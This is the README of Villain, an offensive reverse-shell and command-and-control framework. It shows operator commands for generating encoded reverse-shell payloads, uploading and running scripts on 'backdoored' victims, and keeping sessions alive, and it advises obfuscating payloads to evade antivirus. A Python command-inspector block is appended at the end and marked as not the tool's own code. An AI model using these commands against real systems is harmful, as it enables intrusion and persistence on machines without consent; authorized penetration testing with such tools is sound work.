[2022-11-30] John Hammond showcased the tool in this incredible video -> youtube.com/watch?v=pTUggbSCqA0
[2023-03-30] Latest release demo, made by me -> youtube.com/watch?v=NqZEmBsLCvQ
Disclaimer: Using this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.
- News
- Generate Reverse Shell Commands
- Connect With Sibling Server
- Shell
- Upload Command
- Conptyshell
- Exec
- Flee
- Purge
- Chat with Sibling Servers
- Session Defender
- A new update mechanism was introduced that compares file signatures from the main branch of the project's repo against the local installation's file signatures and proceeds to upgrade. The "--skip-update" option was also added.
- HoaxShell implants are now reusable as long as they were generated by the Villain instance you are trying to connect back to from the victim (Legit session data is saved on disk and is loaded into memory every time you start Villain on your machine). Villain will also re-establish a session if it receives beacons from it (e.g., because the payload is still running on a victim from a past session).
- You can use the new prompt command "flee" to exit Villain without terminating active sessions. That way, next time you start it, if there are alive beacons from victims, sessions will be re-established.
- The "--insecure" option was added, which allows sibling servers to connect to your instance without approval.
- Added a filter for random socket connections to Villain's TCP multi-listener that should prevent establishing junk sessions.
- Fixed an issue regarding the sessions table that could break because of junk TCP sessions.
- Added the "purge" prompt command to delete all session-related metadata stored on disk.
- The Payload Generator class was redesigned to work by dynamically engaging payload templates with a standard structure. This makes payload generation much easier and allows users to edit the default payload templates or add their own, according to their needs & tactics. As you'll notice, most of the default templates I've added for both Windows and Linux are designed to start as new processes.
- The stability and general functionality of the pseudo-shell prompt ("shell" command) have been significantly improved.
- The "upload" and "conptyshell" commands were added.
- A new chat feature was added (you can broadcast messages to all siblings by starting a command with "#").
- The "exec" command is also improved but still kind of unstable. Someday it's gonna be doing wonders. Have a little faith.
Use the "generate" prompt command to generate payloads for Windows / Linux machines.
In the latest Villain release, this function was redesigned to use payload templates (files). In Core/payload_templates/<OS>/<HANDLER>/ you can find these templates, edit them, make your own, etc. Ultimately, you should replace the predefined Windows reverse shell commands with obfuscated versions. That way you can create a personalized instance of Villain and deal with AV evasion in a more productive and efficient way. Here's how 📽️ -> youtube.com/watch?v=grSBdZdUya0
Main logic:
generate payload=<OS_TYPE/HANDLER/PAYLOAD_TEMPLATE> lhost=<IP or INTERFACE> [ obfuscate encode ]
Usage examples:
generate payload=windows/netcat/powershell_reverse_tcp lhost=eth0 encode
generate payload=linux/hoaxshell/sh_curl lhost=eth0
- The ENCODE and OBFUSCATE keywords are enabled for certain templates and can be used during payload generation.
- For info on a particular template, use "generate" with PAYLOAD being the only provided argument.
- To catch HoaxShell https-based reverse shells you need to start Villain with SSL.
- Ultimately, one should edit the templates and add obfuscated versions of the commands for AV evasion.
⚡TCP socket based shells (netcat) are more stable and reliable than HoaxShell.
Use the prompt commands "backdoors" and "sessions" to list info about your active shell sessions.
Use the "connect" prompt command to connect and share your shell sessions with another machine running Villain.
connect <IP> <TEAM SERVER PORT>
By default, the Core server port is 65001 (you can change that with -p when starting Villain).
Use the "shell" prompt command to start an interactive pseudo-shell for a shell session. The effectiveness of the pseudo-shell is going to vary depending on the quality and stability of the shell session. Again, you should prefer TCP socket based shells as they will always be more stable than HoaxShell.
shell <SESSION ID or ALIAS>
Press Ctrl + C or type "exit" to return to the main Villain prompt.
Use the "upload" prompt command to transfer a file from your system to a backdoored machine. The file is fetched automatically over HTTP from the Http File Smuggler (running by default on port 8888). The feature works regardless of whether the session is owned by you or by a sibling server. You can run the command from Villain's main prompt as well as from the pseudo-shell terminal.
From the main prompt:
upload <LOCAL_FILE_PATH> <REMOTE_FILE_PATH> <SESSION ID or ALIAS>
From an active pseudo shell prompt:
upload <LOCAL_FILE_PATH> <REMOTE_FILE_PATH>
Use the "conptyshell" prompt command to automatically run Invoke-ConPtyShell.ps1 against a shell session. A new terminal window with netcat listening will pop up (you need to have gnome-terminal installed) and the script will be executed on the target as a new process, meaning you get a fully interactive shell AND you get to keep your backdoor. Currently works only for powershell.exe backdoors.
Because I love Invoke-ConPtyShell.
Usage:
conptyshell <IP or INTERFACE> <PORT> <SESSION ID or ALIAS>
Use the "exec" prompt command to execute a quoted command or a script from your file system against a session. Files are executed by being fetched over HTTP from the Http File Smuggler. Be careful! The script you execute should match the shell session type (e.g., a PowerShell script should be executed against a powershell.exe session, etc.).
Usage:
exec </path/to/local/file> <SESSION ID or ALIAS>
exec 'net user;Get-Date' <SESSION ID or ALIAS>
Use the "flee" prompt command to exit Villain without terminating any active sessions. If you start Villain again later and there are still victim machines sending HoaxShell beacons, the sessions will be re-established automatically.
Villain automatically stores information regarding generated implants and loads it into memory every time it starts. This way, HoaxShell generated implants become reusable and it is possible to re-establish older sessions, assuming the payload is still running on the victim(s). Use the "purge" prompt command to delete all session-related metadata. It does not affect any active sessions you may have.
Commands starting with "#" are interpreted as messages and will be broadcasted to all connected Sibling Servers.
Villain has a function that inspects user-issued shell commands for input that may cause a backdoor shell session to hang (e.g., unclosed single/double quotes or backticks, commands that may start a new interactive session within the current shell, and more). Use the "cmdinspector" command to turn that feature on/off.
Usage:
cmdinspector <ON/OFF>
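The kind of pre-send check described above, as an added example that is not Villain's own code: a small inspector that flags unbalanced quotes/backticks (nesting-aware, so a backtick opened inside double quotes still needs its own close) and first tokens that are likely to open an interactive program. It assumes POSIX sh quoting rules; the interactive-command list is an assumed, illustrative set.

```python
import re

# Assumed, illustrative list of programs that take over the terminal and
# would leave a non-interactive backdoor shell waiting forever.
INTERACTIVE_CMDS = {"vi", "vim", "nano", "less", "more", "top",
                    "python", "python3", "ssh", "ftp", "telnet"}


def find_unbalanced(cmd: str):
    """Return the innermost unclosed delimiter (', \" or `), or None.

    POSIX sh rules: nothing is special inside single quotes; a backslash
    escapes the next character elsewhere; a backtick may open a command
    substitution inside double quotes, and quotes may open inside backticks.
    """
    stack = []  # currently open delimiters, innermost last
    i = 0
    while i < len(cmd):
        ch = cmd[i]
        top = stack[-1] if stack else None
        if top == "'":
            if ch == "'":
                stack.pop()
        elif ch == "\\":
            i += 1  # skip the escaped character
        elif ch == top:
            stack.pop()
        elif top == '"':
            if ch == "`":
                stack.append(ch)
        elif ch in "'\"`":
            stack.append(ch)
        i += 1
    return stack[-1] if stack else None


def inspect_command(cmd: str) -> list:
    """Return warnings for a command; an empty list means nothing suspicious."""
    warnings = []
    unclosed = find_unbalanced(cmd)
    if unclosed:
        warnings.append(f"unclosed {unclosed} delimiter")
    # Heuristic split on ; | || && to look at the first word of each segment.
    for segment in re.split(r"\|\||&&|[;|]", cmd):
        tokens = segment.strip().split()
        if tokens and tokens[0].rsplit("/", 1)[-1] in INTERACTIVE_CMDS:
            warnings.append(f"'{tokens[0]}' may start an interactive session")
    return warnings
```

A caller would refuse to send the command (or ask for confirmation) whenever the returned list is non-empty.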